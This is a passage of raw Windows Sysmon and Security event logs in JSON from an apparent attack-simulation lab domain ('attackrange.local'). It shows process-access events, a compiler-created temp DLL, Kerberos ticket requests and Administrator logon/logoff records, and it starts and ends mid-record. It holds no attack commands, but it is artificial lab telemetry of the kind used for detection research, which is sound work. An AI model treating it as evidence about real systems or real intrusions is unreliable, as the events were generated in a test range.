06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5470,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.181\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.181","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.197\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.197","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:16.197\r\nProcessGuid: {E2A3D6B1-11D4-5F25-0000-00105A040800}\r\nProcessId: 3864\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.dll\r\nCreationUtcTime: 2020-08-01 06:55:16.119","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:16.197","ProcessGuid":"{E2A3D6B1-11D4-5F25-0000-00105A040800}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\cb34xv0r\\cb34xv0r.dll","CreationUtcTime":"2020-08-01 06:55:16.119","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.525\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.525","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220555,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7C004\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7c004","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220556,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7D743\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7d743","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220557,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7E458\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7e458","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:16.806\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:16.806","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220558,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220559,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220560,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{7FF916DC-DFFB-DD6F-2100-4628BF43D695}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220561,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x80ADE\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{7FF916DC-DFFB-DD6F-2100-4628BF43D695}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not 